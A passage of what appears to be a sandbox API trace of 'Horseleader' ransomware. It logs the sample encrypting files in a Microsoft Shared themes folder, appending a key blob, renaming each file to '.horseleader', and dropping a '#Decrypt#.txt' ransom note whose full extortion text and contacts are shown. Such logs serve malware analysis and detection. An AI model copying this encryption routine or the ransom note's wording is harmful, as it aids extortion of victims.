returned 0x0 [0246.369] lstrcmpW (lpString1="CAPSULES.INF", lpString2="#Decrypt#.txt") returned 1 [0246.369] lstrcmpW (lpString1="CAPSULES.INF", lpString2="_uninstalling_.png") returned 1 [0246.369] lstrlenW (lpString=".testttjffg") returned 11 [0246.369] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF", lpSrch=".testttjffg") returned 0x0 [0246.369] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.369] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.370] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF") returned 81 [0246.370] StrStrW (lpFirst="CAPSULES.INF", lpSrch=".txt") returned 0x0 [0246.370] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=501) returned 1 [0246.370] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1f5, lpOverlapped=0x0) returned 1 [0246.371] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.371] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1f5, lpOverlapped=0x0) returned 1 [0246.372] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.372] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.372] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.372] CloseHandle (hObject=0x1a4) returned 1 [0246.372] GetProcessHeap () returned 0x780000 [0246.372] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.372] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF.horseleader") returned 93 [0246.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\CAPSULES\\CAPSULES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\CAPSULES.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\capsules.inf.horseleader")) returned 1 [0246.376] GetProcessHeap () returned 0x780000 [0246.376] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.376] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7fc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.376] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.376] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 80 [0246.376] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.377] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.377] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.377] lstrlenW (lpString=".testttjffg") returned 11 [0246.377] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.377] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.377] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.377] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.379] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF") returned 80 [0246.379] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.379] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2044) returned 1 [0246.379] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x7fc, lpOverlapped=0x0) returned 1 [0246.381] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff804, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.381] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x7fc, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x7fc, lpOverlapped=0x0) returned 1 [0246.382] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.382] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 
lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.382] CloseHandle (hObject=0x1a4) returned 1 [0246.382] GetProcessHeap () returned 0x780000 [0246.382] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.382] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.horseleader") returned 92 [0246.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\preview.gif.horseleader")) returned 1 [0246.383] GetProcessHeap () returned 0x780000 [0246.383] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.383] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x74e5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.384] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.384] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 81 [0246.384] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 
[0246.384] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.384] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.384] lstrlenW (lpString=".testttjffg") returned 11 [0246.384] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.384] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.384] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.384] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.385] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 81 [0246.385] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.385] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=29925) returned 1 [0246.385] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.389] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.389] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.389] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x24e5, lpOverlapped=0x0) returned 1 [0246.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffdb1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.390] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x24e5, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x24e5, lpOverlapped=0x0) returned 1 [0246.390] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.390] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.390] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.390] CloseHandle (hObject=0x1a4) returned 1 [0246.391] GetProcessHeap () returned 0x780000 [0246.391] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.391] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.horseleader") returned 93 [0246.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.horseleader")) returned 1 [0246.392] GetProcessHeap () returned 0x780000 [0246.392] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.392] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x74e5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.392] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.392] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\#Decrypt#.txt") returned 82 [0246.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.393] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.393] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.395] lstrlenA (lpString="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") returned 1368 [0246.395] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.395] CloseHandle (hObject=0x158) returned 1 [0246.395] GetProcessHeap () returned 0x780000 [0246.395] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.395] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CASCADE", cAlternateFileName="")) returned 1 [0246.395] lstrcmpiW (lpString1="CASCADE", lpString2="Windows") returned -1 [0246.395] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE") returned 67 [0246.395] lstrcmpW (lpString1="CASCADE", lpString2=".") returned 1 [0246.396] lstrcmpW (lpString1="CASCADE", lpString2="..") returned 1 [0246.396] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.396] GetProcessHeap () returned 0x780000 [0246.396] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.396] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*") returned 69 [0246.396] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.417] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.417] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\.") returned 69 [0246.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.417] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c50cb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.418] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.418] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\..") returned 70 [0246.418] lstrcmpW (lpString1="..", lpString2=".") returned 1 
[0246.418] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.418] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xede9bc00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51c50cb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xede9bc00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xba44, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="CASCADE.ELM", cAlternateFileName="")) returned 1 [0246.418] lstrcmpiW (lpString1="CASCADE.ELM", lpString2="Windows") returned -1 [0246.418] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM") returned 79 [0246.418] StrStrIW (lpFirst="CASCADE.ELM", lpSrch=".horseleader") returned 0x0 [0246.418] lstrcmpW (lpString1="CASCADE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.419] lstrcmpW (lpString1="CASCADE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.419] lstrlenW (lpString=".testttjffg") returned 11 [0246.419] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.419] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.419] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.419] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\cascade.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.420] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\CASCADE.ELM") returned 79 [0246.420] StrStrW (lpFirst="CASCADE.ELM", lpSrch=".txt") returned 0x0 [0246.420] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47684) returned 1 [0246.420] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.423] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.424] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.425] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.425] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.425] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.425] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1a44, lpOverlapped=0x0) returned 1 [0246.426] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe5bc, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.426] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1a44, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1a44, lpOverlapped=0x0) returned 1 [0246.426] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.426] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.426] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.426] CloseHandle (hObject=0x1a4) 